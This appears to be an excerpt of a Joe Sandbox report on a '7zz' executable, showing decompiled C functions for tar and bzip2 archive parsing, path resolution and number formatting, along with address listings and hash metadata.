								 *((char*)(_t251 + 0x5d)) = _t140 & 0xffffff00 |  *((char*)(_t253 - 0x103)) != 0x00000000;
								_t143 = E00438E29(_t253 - 0x103, _t251 + 0x28);
								__eflags = _t143;
								if(_t143 == 0) {
									goto L26;
								}
								__eflags =  *((char*)(_t253 - 0xfb));
								 *((char*)(_t251 + 0x5e)) = _t143 & 0xffffff00 |  *((char*)(_t253 - 0xfb)) != 0x00000000;
								_t146 = E00438E29(_t253 - 0xfb, _t251 + 0x2c);
								__eflags = _t146;
								if(_t146 != 0) {
									 *((intOrPtr*)(_t253 - 0x1c)) = 0;
									 *(_t253 - 0x18) = 0;
									 *((intOrPtr*)(_t253 - 0x14)) = 0;
									E00401EEE(_t253 - 0x1c, 3);
									 *((intOrPtr*)(_t253 - 4)) = 0;
									E00438E71(_t253 - 0xf3, 0x9b, _t253 - 0x1c);
									__eflags =  *(_t253 - 0x18);
									if( *(_t253 - 0x18) == 0) {
										L33:
										__eflags =  *((char*)(_t251 + 0x5c)) - 0x31;
										if( *((char*)(_t251 + 0x5c)) == 0x31) {
											_t153 =  *(_t253 + 0xc);
											 *_t153 = 0;
											_t153[1] = 0;
										}
										_t204 = 0;
										_t150 = 0;
										__eflags = 0;
										do {
											_t204 = _t204 + ( *(_t253 + _t150 - 0x24c) & 0x000000ff);
											_t150 = _t150 + 1;
											__eflags = _t150 - 0x200;
										} while (_t150 < 0x200);
										__eflags = _t204 -  *((intOrPtr*)(_t253 - 0x24));
										if(_t204 ==  *((intOrPtr*)(_t253 - 0x24))) {
											__eflags = 0;
											 *((char*)( *((intOrPtr*)(_t253 - 0x20)))) = 1;
										} else {
											_push(1);
											_pop(0);
										}
										E00407A18( *((intOrPtr*)(_t253 - 0x1c)));
										_t109 = 0;
										goto L41;
									}
									_t154 = 0;
									__eflags = 0;
									while(1) {
										_t233 =  *0x48d380; // 0x48d394
										__eflags =  *((intOrPtr*)(_t244 + _t154)) -  *((intOrPtr*)(_t233 + _t154));
										if( *((intOrPtr*)(_t244 + _t154)) !=  *((intOrPtr*)(_t233 + _t154))) {
											goto L33;
										}
										_t154 = _t154 + 1;
										__eflags = _t154 - 5;
										if(_t154 < 5) {
											continue;
										}
										__eflags =  *((char*)(_t251 + 0x5c)) - 0x4c;
										if(__eflags != 0) {
											_push(E00438EA7(_t253 - 0x40, __eflags, 0x2f));
											 *((char*)(_t253 - 4)) = 1;
											_t156 = E0040AFFE(_t253 - 0x4c, _t253 - 0x1c);
											_push(_t251);
											 *((char*)(_t253 - 4)) = 2;
											_t157 = E0040AFFE(_t253 - 0x34, _t156);
											 *((char*)(_t253 - 4)) = 3;
											L00407E17(_t251, _t157);
											E00407A18( *((intOrPtr*)(_t253 - 0x34)));
											E00407A18( *((intOrPtr*)(_t253 - 0x4c)));
											E00407A18( *((intOrPtr*)(_t253 - 0x40)));
										}
										goto L33;
									}
									goto L33;
								}
								goto L26;
							}
						}
						_push("There are data after end of archive");
						goto L12;
					}
					 *(_t253 + 0xf) = 1;
					 *((intOrPtr*)(_t253 - 0x10)) = 0x200;
					_t109 = E0040FA74( *((intOrPtr*)(_t253 - 0x28)), _t253 - 0x24c, _t253 - 0x10);
					if(_t109 == 0) {
						continue;
					}
					goto L41;
				}
				__eflags =  *(_t253 + 0xf);
				if( *(_t253 + 0xf) != 0) {
					goto L13;
				}
				_push("There are no trailing zero-filled records");
				goto L12;
			}



































                                                                      0x00438a33
                                                                      0x00438a41
                                                                      0x00438a44
                                                                      0x00438a48
                                                                      0x00438a4d
                                                                      0x00438a56
                                                                      0x00438a59
                                                                      0x00438a5c
                                                                      0x00438a69
                                                                      0x00438a6c
                                                                      0x00438a73
                                                                      0x00438dc2
                                                                      0x00438dc8
                                                                      0x00438dd0
                                                                      0x00438dd0
                                                                      0x00438a79
                                                                      0x00438a7c
                                                                      0x00438a85
                                                                      0x00438ac8
                                                                      0x00438ada
                                                                      0x00438adc
                                                                      0x00438ae1
                                                                      0x00438ae1
                                                                      0x00000000
                                                                      0x00438ae1
                                                                      0x00438a87
                                                                      0x00438a97
                                                                      0x00438acf
                                                                      0x00438ad3
                                                                      0x00438ae8
                                                                      0x00438aeb
                                                                      0x00438af2
                                                                      0x00438b00
                                                                      0x00438b03
                                                                      0x00438b06
                                                                      0x00438b0b
                                                                      0x00438b0d
                                                                      0x00438cdc
                                                                      0x00438cde
                                                                      0x00000000
                                                                      0x00438cde
                                                                      0x00438b13
                                                                      0x00438b1f
                                                                      0x00438b24
                                                                      0x00438b26
                                                                      0x00438b28
                                                                      0x00438b28
                                                                      0x00438b28
                                                                      0x00438b2b
                                                                      0x00438b37
                                                                      0x00438b3c
                                                                      0x00438b3e
                                                                      0x00438b40
                                                                      0x00438b40
                                                                      0x00438b40
                                                                      0x00438b6e
                                                                      0x00438b73
                                                                      0x00438b76
                                                                      0x00438b79
                                                                      0x00438be5
                                                                      0x00438be8
                                                                      0x00438bef
                                                                      0x00438bf4
                                                                      0x00438bf6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00438b7b
                                                                      0x00438bd9
                                                                      0x00438bde
                                                                      0x00438be0
                                                                      0x00438bfc
                                                                      0x00438c05
                                                                      0x00438c09
                                                                      0x00438c0e
                                                                      0x00438c10
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00438c22
                                                                      0x00438c27
                                                                      0x00438c29
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00438c3d
                                                                      0x00438c4b
                                                                      0x00438c51
                                                                      0x00438c54
                                                                      0x00438c5b
                                                                      0x00438c66
                                                                      0x00438c6c
                                                                      0x00438c7d
                                                                      0x00438c80
                                                                      0x00438c81
                                                                      0x00438c8f
                                                                      0x00438c92
                                                                      0x00438c93
                                                                      0x00438c98
                                                                      0x00438caa
                                                                      0x00438cb1
                                                                      0x00438cb6
                                                                      0x00438cb8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00438cba
                                                                      0x00438ccc
                                                                      0x00438cd3
                                                                      0x00438cd8
                                                                      0x00438cda
                                                                      0x00438ceb
                                                                      0x00438cee
                                                                      0x00438cf1
                                                                      0x00438cf4
                                                                      0x00438d08
                                                                      0x00438d0b
                                                                      0x00438d10
                                                                      0x00438d13
                                                                      0x00438d81
                                                                      0x00438d81
                                                                      0x00438d85
                                                                      0x00438d87
                                                                      0x00438d8a
                                                                      0x00438d8c
                                                                      0x00438d8c
                                                                      0x00438d8f
                                                                      0x00438d91
                                                                      0x00438d91
                                                                      0x00438d93
                                                                      0x00438d9b
                                                                      0x00438d9d
                                                                      0x00438d9e
                                                                      0x00438d9e
                                                                      0x00438da5
                                                                      0x00438da8
                                                                      0x00438db2
                                                                      0x00438db4
                                                                      0x00438daa
                                                                      0x00438daa
                                                                      0x00438dac
                                                                      0x00438dac
                                                                      0x00438dba
                                                                      0x00438dc0
                                                                      0x00000000
                                                                      0x00438dc0
                                                                      0x00438d15
                                                                      0x00438d15
                                                                      0x00438d17
                                                                      0x00438d17
                                                                      0x00438d20
                                                                      0x00438d23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00438d25
                                                                      0x00438d26
                                                                      0x00438d29
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00438d2b
                                                                      0x00438d2f
                                                                      0x00438d3b
                                                                      0x00438d42
                                                                      0x00438d46
                                                                      0x00438d4b
                                                                      0x00438d51
                                                                      0x00438d55
                                                                      0x00438d5d
                                                                      0x00438d61
                                                                      0x00438d69
                                                                      0x00438d71
                                                                      0x00438d79
                                                                      0x00438d7e
                                                                      0x00000000
                                                                      0x00438d2f
                                                                      0x00000000
                                                                      0x00438d17
                                                                      0x00000000
                                                                      0x00438cda
                                                                      0x00438b79
                                                                      0x00438ad5
                                                                      0x00000000
                                                                      0x00438ad5
                                                                      0x00438aa6
                                                                      0x00438aaa
                                                                      0x00438aad
                                                                      0x00438ab4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00438ab6
                                                                      0x00438abb
                                                                      0x00438abf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00438ac1
                                                                      0x00000000

                                                                      APIs
                                                                      Strings
                                                                      • There are data after end of archive, xrefs: 00438AD5
                                                                      • There are no trailing zero-filled records, xrefs: 00438AC1
                                                                      • There is no correct record at the end of archive, xrefs: 00438AC8
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: There are data after end of archive$There are no trailing zero-filled records$There is no correct record at the end of archive
                                                                      • API String ID: 3519838083-3898197850
                                                                      • Opcode ID: 3ddcd38165be4bcf837a9b22d6199cdc7b4c165d71977855116068728752eb8a
                                                                      • Instruction ID: 8a8560e65d813f7a5cec42f637569da3f69274a6d4fc9a9a4ce8affac6b4ac77
                                                                      • Opcode Fuzzy Hash: 3ddcd38165be4bcf837a9b22d6199cdc7b4c165d71977855116068728752eb8a
                                                                      • Instruction Fuzzy Hash: 92B10070D003599EDB21EB24C891BEEFBB4AF58304F0454AFF445A3282DB78AA49CB54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040A28C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 97%
                                                                      			E0040A28C(WCHAR* __ecx, WCHAR** __edx) {
				intOrPtr* _t69;
				signed char _t71;
				void* _t74;
				void* _t78;
				void* _t83;
				signed char _t89;
				WCHAR* _t92;
				WCHAR* _t94;
				long _t95;
				WCHAR* _t96;
				signed int _t97;
				WCHAR* _t100;
				long _t103;
				WCHAR* _t105;
				long _t106;
				WCHAR* _t115;
				signed int _t133;
				signed int _t136;
				WCHAR* _t138;
				signed int _t148;
				WCHAR* _t149;
				signed int* _t153;
				WCHAR** _t156;
				void* _t158;

				E0046B890(E00473B7C, _t158);
				_t156 = __edx;
				 *(_t158 - 0x10) = __ecx;
				 *((intOrPtr*)(__edx + 4)) = 0;
				 *((short*)( *((intOrPtr*)(__edx)))) = 0;
				if( *0x490a7c == 0) {
					 *((intOrPtr*)(_t158 - 0x28)) = 0;
					 *((intOrPtr*)(_t158 - 0x24)) = 0;
					 *((intOrPtr*)(_t158 - 0x20)) = 0;
					E00401EEE(_t158 - 0x28, 3);
					 *(_t158 - 4) = 0;
					_t69 = E00409AD5(_t158 - 0x4c,  *(_t158 - 0x10));
					_t153 =  *(_t158 + 8);
					 *(_t158 - 4) = 1;
					_t71 = E0040A20F( *_t69, _t158 - 0x28, _t153);
					asm("sbb bl, bl");
					 *(_t158 - 4) =  *(_t158 - 4) & 0x00000000;
					E00407A18( *((intOrPtr*)(_t158 - 0x4c)));
					__eflags =  ~_t71 + 1;
					if( ~_t71 + 1 == 0) {
						_t74 = E0040AF39(_t158 - 0x28, _t158 - 0x4c,  *_t153);
						 *(_t158 - 4) = 2;
						E004098A8(_t74);
						 *(_t158 - 4) = 4;
						E00407A18( *((intOrPtr*)(_t158 - 0x4c)));
						_t78 = E0040AF18(_t158 - 0x28, _t158 - 0x58,  *_t153);
						 *(_t158 - 4) = 5;
						E004098A8(_t78);
						 *(_t158 - 4) = 7;
						E00407A18( *((intOrPtr*)(_t158 - 0x58)));
						 *_t153 =  *(_t158 - 0x30);
						_push(_t158 - 0x40);
						_t83 = E0040B0A0(_t158 - 0x4c, _t158 - 0x34);
						 *(_t158 - 4) = 8;
						E00401E26(_t156, _t83);
						E00407A18( *((intOrPtr*)(_t158 - 0x4c)));
						E00407A18( *((intOrPtr*)(_t158 - 0x40)));
						E00407A18( *((intOrPtr*)(_t158 - 0x34)));
						E00407A18( *((intOrPtr*)(_t158 - 0x28)));
						goto L26;
					} else {
						E00407A18( *((intOrPtr*)(_t158 - 0x28)));
						goto L24;
					}
				} else {
					 *(_t158 - 0x18) = 0;
					if( *((intOrPtr*)(__edx + 8)) <= 0x104) {
						E00401E9A(__edx, 0x104);
					}
					_t92 =  *_t156;
					 *(_t158 - 0x1c) = _t92;
					 *(_t158 - 0x14) = GetFullPathNameW( *(_t158 - 0x10), 0x105, _t92, _t158 - 0x18);
					_t94 =  *_t156;
					_t133 = 0;
					if( *_t94 != 0) {
						_t149 = _t94;
						do {
							_t133 = _t133 + 1;
							_t149 =  &(_t149[1]);
						} while ( *_t149 != 0);
					}
					_t94[_t133] = 0;
					_t95 =  *(_t158 - 0x14);
					_t156[1] = _t133;
					if(_t95 == 0) {
						L24:
						_t89 = 0;
					} else {
						if(_t95 < 0x104) {
							L15:
							_t96 =  *(_t158 - 0x18);
							if(_t96 != 0) {
								_t97 = _t96 -  *(_t158 - 0x1c);
								__eflags = _t97;
								 *( *(_t158 + 8)) = _t97 >> 1;
							} else {
								_t100 =  *(_t158 - 0x10);
								_t136 = 0;
								while( *_t100 != 0) {
									_t136 = _t136 + 1;
									_t100 =  &(_t100[1]);
								}
								 *( *(_t158 + 8)) = _t136;
							}
							E0040A4A1( *(_t158 - 0x10), _t156, __eflags);
							L26:
							_t89 = 1;
						} else {
							_t103 = _t95 + 1;
							 *(_t158 - 0x14) = _t103;
							_t104 = _t103 + 1;
							if(_t103 + 1 >= _t156[2]) {
								E00401E9A(_t156, _t104);
							}
							_t105 =  *_t156;
							 *(_t158 - 0x1c) = _t105;
							_t106 = GetFullPathNameW( *(_t158 - 0x10),  *(_t158 - 0x14), _t105, _t158 - 0x18);
							_t138 =  *_t156;
							_t148 = 0;
							if( *_t138 != 0) {
								_t115 = _t138;
								do {
									_t148 = _t148 + 1;
									_t115 =  &(_t115[1]);
								} while ( *_t115 != 0);
							}
							_t138[_t148] = 0;
							_t156[1] = _t148;
							if(_t106 == 0 || _t106 >  *(_t158 - 0x14)) {
								goto L24;
							} else {
								goto L15;
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t158 - 0xc));
				return _t89;
			}



























                                                                      0x0040a291
                                                                      0x0040a29b
                                                                      0x0040a2a0
                                                                      0x0040a2a5
                                                                      0x0040a2a8
                                                                      0x0040a2b2
                                                                      0x0040a3a0
                                                                      0x0040a3a3
                                                                      0x0040a3a6
                                                                      0x0040a3a9
                                                                      0x0040a3b4
                                                                      0x0040a3b7
                                                                      0x0040a3be
                                                                      0x0040a3c7
                                                                      0x0040a3cb
                                                                      0x0040a3d7
                                                                      0x0040a3d9
                                                                      0x0040a3df
                                                                      0x0040a3e4
                                                                      0x0040a3e7
                                                                      0x0040a402
                                                                      0x0040a40c
                                                                      0x0040a410
                                                                      0x0040a418
                                                                      0x0040a41c
                                                                      0x0040a42b
                                                                      0x0040a435
                                                                      0x0040a439
                                                                      0x0040a441
                                                                      0x0040a445
                                                                      0x0040a44e
                                                                      0x0040a453
                                                                      0x0040a45a
                                                                      0x0040a462
                                                                      0x0040a466
                                                                      0x0040a46e
                                                                      0x0040a476
                                                                      0x0040a47e
                                                                      0x0040a486
                                                                      0x00000000
                                                                      0x0040a3e9
                                                                      0x0040a3ec
                                                                      0x00000000
                                                                      0x0040a3f1
                                                                      0x0040a2b8
                                                                      0x0040a2bd
                                                                      0x0040a2c3
                                                                      0x0040a2c8
                                                                      0x0040a2c8
                                                                      0x0040a2cd
                                                                      0x0040a2d8
                                                                      0x0040a2e7
                                                                      0x0040a2ea
                                                                      0x0040a2ec
                                                                      0x0040a2f1
                                                                      0x0040a2f3
                                                                      0x0040a2f5
                                                                      0x0040a2f5
                                                                      0x0040a2f7
                                                                      0x0040a2f8
                                                                      0x0040a2f5
                                                                      0x0040a2fd
                                                                      0x0040a301
                                                                      0x0040a306
                                                                      0x0040a309
                                                                      0x0040a3f2
                                                                      0x0040a3f2
                                                                      0x0040a30f
                                                                      0x0040a314
                                                                      0x0040a365
                                                                      0x0040a365
                                                                      0x0040a36a
                                                                      0x0040a382
                                                                      0x0040a382
                                                                      0x0040a38a
                                                                      0x0040a36c
                                                                      0x0040a36c
                                                                      0x0040a36f
                                                                      0x0040a371
                                                                      0x0040a376
                                                                      0x0040a378
                                                                      0x0040a378
                                                                      0x0040a37e
                                                                      0x0040a37e
                                                                      0x0040a391
                                                                      0x0040a48e
                                                                      0x0040a48e
                                                                      0x0040a316
                                                                      0x0040a316
                                                                      0x0040a317
                                                                      0x0040a31a
                                                                      0x0040a31e
                                                                      0x0040a323
                                                                      0x0040a323
                                                                      0x0040a328
                                                                      0x0040a332
                                                                      0x0040a338
                                                                      0x0040a33a
                                                                      0x0040a33c
                                                                      0x0040a341
                                                                      0x0040a343
                                                                      0x0040a345
                                                                      0x0040a345
                                                                      0x0040a347
                                                                      0x0040a348
                                                                      0x0040a345
                                                                      0x0040a34d
                                                                      0x0040a353
                                                                      0x0040a356
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040a356
                                                                      0x0040a314
                                                                      0x0040a309
                                                                      0x0040a496
                                                                      0x0040a49e

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 0040A291
                                                                      • GetFullPathNameW.KERNEL32(?,00000105,00000104,00000002,00000000,59@,00000000), ref: 0040A2E5
                                                                      • GetFullPathNameW.KERNEL32(?,?,00000001,00000002), ref: 0040A338
                                                                        • Part of subcall function 004098A8: AreFileApisANSI.KERNEL32(?,?,?,0040AA48,00000003,?,?,?,?,?,?,?), ref: 004098B4
                                                                        • Part of subcall function 0040B0A0: __EH_prolog.LIBCMT ref: 0040B0A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: FullH_prologNamePath$ApisFile
                                                                      • String ID: 59@
                                                                      • API String ID: 1887739612-2780377667
                                                                      • Opcode ID: e984556f7341f834eb6f76e66d3e67b41fabcb05650be67429daeab63fa82d0f
                                                                      • Instruction ID: 0a5654e161e1f716a3f046905b73ad11417bb6cb1d0641c1b6b0c0ecaf941a14
                                                                      • Opcode Fuzzy Hash: e984556f7341f834eb6f76e66d3e67b41fabcb05650be67429daeab63fa82d0f
                                                                      • Instruction Fuzzy Hash: 53619A71E40209DFCB01EFA5C8419EEBBB5EF59304F10843EE452B7291DB785A518BAA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004060D4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004060D4(void* __ecx) {
				unsigned int _v8;
				void* _v12;
				char _v43;
				char _v44;
				char _v160;
				void* _t50;
				void* _t53;
				unsigned int _t54;
				intOrPtr* _t55;
				intOrPtr _t60;
				int _t62;
				int _t69;
				void* _t72;
				signed int _t73;
				signed int _t79;
				unsigned int _t80;
				void _t81;
				char _t85;
				unsigned int _t86;
				signed int _t87;
				signed int _t92;
				signed int _t97;
				signed int _t98;
				void* _t103;
				void* _t104;
				unsigned int _t105;
				signed int _t106;
				void* _t107;
				void* _t108;
				signed int _t109;
				void* _t111;
				void* _t112;
				void* _t115;
				void* _t118;
				void* _t121;
				void* _t122;
				void* _t123;

				_t121 = __ecx;
				_t110 =  *(__ecx + 0x18);
				_t71 =  *(__ecx + 0x1c);
				if(( *(__ecx + 0x18) |  *(__ecx + 0x1c)) != 0) {
					_t50 = E0046B300(E0046B370( *((intOrPtr*)(__ecx + 0x10)),  *((intOrPtr*)(__ecx + 0x14)), 0x64, 0), _t103, _t110, _t71);
					_t111 = _t103;
				} else {
					_t50 = 0;
					_t111 = 0;
				}
				_t104 = 0xa;
				E004075FF( &_v44, _t104, _t50, _t111);
				_t53 = E0046B400( &_v44);
				 *((char*)(_t122 + _t53 - 0x28)) = 0x25;
				 *(_t122 + _t53 - 0x27) =  *(_t122 + _t53 - 0x27) & 0x00000000;
				_t54 = _t53 + 1;
				_v8 = _t54;
				_t105 = 4;
				if(_t54 > _t105) {
					_t105 = _t54;
				}
				_t79 =  *(_t121 + 0x20);
				_t106 = _t105 + 2;
				if(_t106 < _t79) {
					_t106 = _t79;
				}
				_t72 =  &_v160;
				_v12 = _t72;
				if( *(_t121 + 0x20) == 0) {
					if(_t106 > 0) {
						_t97 = _t106;
						_t118 =  &_v160;
						_t98 = _t97 >> 2;
						_t69 = memset(_t118, 0x20202020, _t98 << 2);
						_t72 = _t122 + _t106 - 0x9c;
						_v12 = _t72;
						memset(_t118 + _t98, _t69, (_t97 & 0x00000003) << 0);
						_t123 = _t123 + 0x18;
						_t54 = _v8;
					}
					 *(_t121 + 0x20) = _t106;
				}
				_t80 =  *(_t121 + 0x20);
				if(_t80 > 0) {
					_t115 = _t72;
					_t73 = _t80;
					_t92 = _t80 >> 2;
					memset(_t115 + _t92, memset(_t115, 0x8080808, _t92 << 2), (_t73 & 0x00000003) << 0);
					_t123 = _t123 + 0x18;
					_t72 = _v12 + _t73;
					_t54 = _v8;
				}
				 *(_t121 + 0x20) = _t106;
				if(_t54 < _t106) {
					_t109 = _t106 - _t54;
					_t86 = _t109;
					_t112 = _t72;
					_v8 = _t86;
					_t87 = _t86 >> 2;
					_t62 = memset(_t112, 0x20202020, _t87 << 2);
					_t72 = _t72 + _t109;
					memset(_t112 + _t87, _t62, (_t109 & 0x00000003) << 0);
				}
				_t81 = _v44;
				_t107 = _t72 + 1;
				 *_t72 = _t81;
				_t55 =  &_v43;
				if(_t81 != 0) {
					_t108 = _t107 -  &_v43;
					do {
						_t85 =  *_t55;
						 *((char*)(_t108 + _t55)) = _t85;
						_t55 = _t55 + 1;
					} while (_t85 != 0);
				}
				E00407CD5( *((intOrPtr*)(_t121 + 0x24)),  &_v160);
				L00407CAC( *((intOrPtr*)(_t121 + 0x24)));
				 *((intOrPtr*)(_t121 + 8)) =  *((intOrPtr*)(_t121 + 0x10));
				_t60 =  *((intOrPtr*)(_t121 + 0x14));
				 *((intOrPtr*)(_t121 + 0xc)) = _t60;
				return _t60;
			}








































                                                                      0x004060df
                                                                      0x004060e2
                                                                      0x004060e5
                                                                      0x004060ec
                                                                      0x00406107
                                                                      0x0040610c
                                                                      0x004060ee
                                                                      0x004060ee
                                                                      0x004060f0
                                                                      0x004060f0
                                                                      0x00406113
                                                                      0x00406116
                                                                      0x0040611f
                                                                      0x00406125
                                                                      0x0040612a
                                                                      0x0040612f
                                                                      0x00406132
                                                                      0x00406135
                                                                      0x00406138
                                                                      0x0040613a
                                                                      0x0040613a
                                                                      0x0040613c
                                                                      0x0040613f
                                                                      0x00406144
                                                                      0x00406146
                                                                      0x00406146
                                                                      0x0040614c
                                                                      0x00406152
                                                                      0x00406155
                                                                      0x00406159
                                                                      0x0040615b
                                                                      0x00406164
                                                                      0x0040616a
                                                                      0x0040616d
                                                                      0x00406171
                                                                      0x0040617b
                                                                      0x0040617e
                                                                      0x0040617e
                                                                      0x00406180
                                                                      0x00406180
                                                                      0x00406183
                                                                      0x00406183
                                                                      0x00406186
                                                                      0x0040618b
                                                                      0x0040618d
                                                                      0x0040618f
                                                                      0x00406196
                                                                      0x004061a0
                                                                      0x004061a0
                                                                      0x004061a7
                                                                      0x004061a9
                                                                      0x004061a9
                                                                      0x004061ae
                                                                      0x004061b1
                                                                      0x004061b3
                                                                      0x004061ba
                                                                      0x004061bc
                                                                      0x004061be
                                                                      0x004061c1
                                                                      0x004061c4
                                                                      0x004061cb
                                                                      0x004061cd
                                                                      0x004061cd
                                                                      0x004061cf
                                                                      0x004061d2
                                                                      0x004061d7
                                                                      0x004061d9
                                                                      0x004061dc
                                                                      0x004061e1
                                                                      0x004061e3
                                                                      0x004061e3
                                                                      0x004061e5
                                                                      0x004061e8
                                                                      0x004061e9
                                                                      0x004061e3
                                                                      0x004061f7
                                                                      0x004061ff
                                                                      0x00406208
                                                                      0x0040620b
                                                                      0x0040620e
                                                                      0x00406214

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldiv
                                                                      • String ID: $ $%
                                                                      • API String ID: 3732870572-114112156
                                                                      • Opcode ID: 5f3be3b97577a96593b7eed08c3f672e33e18b0ddb9a91ce93faccb85b3d0260
                                                                      • Instruction ID: b857c6e470453704c1f0b52f1adfc20138d148c1cd609403c8723782e6e4065e
                                                                      • Opcode Fuzzy Hash: 5f3be3b97577a96593b7eed08c3f672e33e18b0ddb9a91ce93faccb85b3d0260
                                                                      • Instruction Fuzzy Hash: 5241B531B007089BDB24CE69D891AAAB7F6EF88304F14853ED546E7382EB34AD18C754
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041CC41 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 95%
                                                                      			E0041CC41() {
				void* _t29;
				void* _t35;
				intOrPtr* _t36;
				void* _t45;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr* _t49;
				void* _t51;
				void* _t53;

				E0046B890(E00475648, _t51);
				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
				_t49 =  *((intOrPtr*)(_t51 + 8));
				 *(_t51 - 4) = 1;
				 *((intOrPtr*)(_t51 - 0x10)) = _t53 - 0xc;
				 *((intOrPtr*)( *_t49 + 0x10))(_t49, _t45, _t48, _t35);
				_t46 =  *((intOrPtr*)(_t51 + 0xc));
				_t36 = _t49 + 0x28;
				_t29 =  *((intOrPtr*)( *_t46 + 0x10))(_t46, 0, 0, 1, _t36);
				_t56 = _t29;
				if(_t29 == 0) {
					_t29 = E0040FAC0(_t56, 3);
					if(_t29 == 0) {
						if( *((char*)(_t51 + 8)) != 0x42 ||  *((char*)(_t51 + 9)) != 0x5a ||  *((char*)(_t51 + 0xa)) != 0x68) {
							_t29 = 1;
						} else {
							_t29 =  *((intOrPtr*)( *_t46 + 0x10))(_t46, 0, 0, 2, _t51 - 0x18);
							if(_t29 == 0) {
								 *((char*)(_t49 + 0x30)) = 1;
								asm("sbb ecx, [ebx+0x4]");
								 *((intOrPtr*)(_t49 + 0x20)) =  *((intOrPtr*)(_t51 - 0x18)) -  *_t36;
								 *((intOrPtr*)(_t49 + 0x24)) =  *((intOrPtr*)(_t51 - 0x14));
								E0040C9B4(_t49 + 0x14, _t46);
								E0040C9B4(_t49 + 0x18, _t46);
								_t29 = 0;
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
				return _t29;
			}












                                                                      0x0041cc46
                                                                      0x0041cc4e
                                                                      0x0041cc54
                                                                      0x0041cc58
                                                                      0x0041cc5e
                                                                      0x0041cc62
